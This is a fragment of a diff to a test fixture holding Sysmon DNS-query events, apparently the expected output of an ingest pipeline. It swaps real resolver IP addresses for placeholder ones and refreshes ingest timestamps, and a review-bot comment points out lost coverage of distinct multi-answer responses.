+4996,11 @@ "type": "CNAME" }, { - "data": "173.231.178.117", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5086,7 +5008,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5094,7 +5016,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5102,7 +5024,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -5110,7 +5032,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -5119,16 +5041,16 @@ } ], "resolved_ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -5145,23 +5067,23 @@ "cm.adgrx.com" ], "ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313799893Z", + "ingested": "2021-12-09T13:49:44.739319600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5229,11 +5151,11 @@ "type": "CNAME" }, { - "data": "104.193.83.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5241,7 +5163,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5249,7 +5171,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5257,7 +5179,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5266,14 +5188,14 @@ } ], "resolved_ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -5291,21 +5213,21 @@ "csm2waycm-atl.netmng.com" ], "ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313801174Z", + "ingested": "2021-12-09T13:49:44.739324600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5355,7 +5277,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313802503Z", + "ingested": "2021-12-09T13:49:44.739327900Z", "code": "4", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e4\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e2\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.011\u003c/Data\u003e\u003cData Name='State'\u003eStarted\u003c/Data\u003e\u003cData Name='Version'\u003e9.01\u003c/Data\u003e\u003cData Name='SchemaVersion'\u003e4.20\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5419,12 +5341,12 @@ "type": "CNAME" }, { - "data": "72.30.2.182", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "network": { 
@@ -5440,13 +5362,13 @@ "pr-bh.ybp.yahoo.com" ], "ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313803837Z", + "ingested": "2021-12-09T13:49:44.739332700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5506,12 +5428,12 @@ }, "answers": [ { - "data": "3.83.220.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "network": { 
@@ -5526,13 +5448,13 @@ "ps.eyeota.net" ], "ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313805112Z", + "ingested": "2021-12-09T13:49:44.739337800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5627,7 +5549,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313806572Z", + "ingested": "2021-12-09T13:49:44.739342700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e3\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.949\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-0010c73e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4860\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e9.01\u003c/Data\u003e\u003cData Name='Description'\u003eSystem activity monitor\u003c/Data\u003e\u003cData Name='Product'\u003eSysinternals Sysmon\u003c/Data\u003e\u003cData Name='Company'\u003eSysinternals - www.sysinternals.com\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData 
Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=AC93C3B38E57A2715572933DBCB2A1C2892DBC5E\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0010f14d0000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e488\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\services.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\services.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5708,17 +5630,17 @@ "type": "CNAME" }, { - "data": "204.2.197.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.2.197.211", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
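Review bot: Replacing the two distinct A answers `"data": "204.2.197.201"` and `"data": "204.2.197.211"` with the same value `"data": "89.160.20.156"` leaves `dns.answers` and `dns.resolved_ip` holding duplicate entries while `related.ip` in the next hunk (-5736) collapses to a single element, so the fixture no longer exercises a multi-answer response with distinct addresses or shows the set semantics of `related.ip` against a real distinction. If the supported subset offers more than one IPv4 address, using a second one for the second answer here (and in the hunks at -6290, where four answers become identical, and -6450) would keep that coverage. The refreshed `event.ingested` values suggest this file is regenerated expected output, so the address choice presumably belongs in the pipeline test input file rather than in an edit to this file.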
@@ -5736,14 +5658,13 @@ "idpix.media6degrees.com" ], "ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313808052Z", + "ingested": "2021-12-09T13:49:44.739346500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5807,11 +5728,11 @@ "type": "CNAME" }, { - "data": "172.217.10.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5819,7 +5740,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -5827,7 +5748,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5835,7 +5756,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5844,14 +5765,14 @@ } ], "resolved_ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
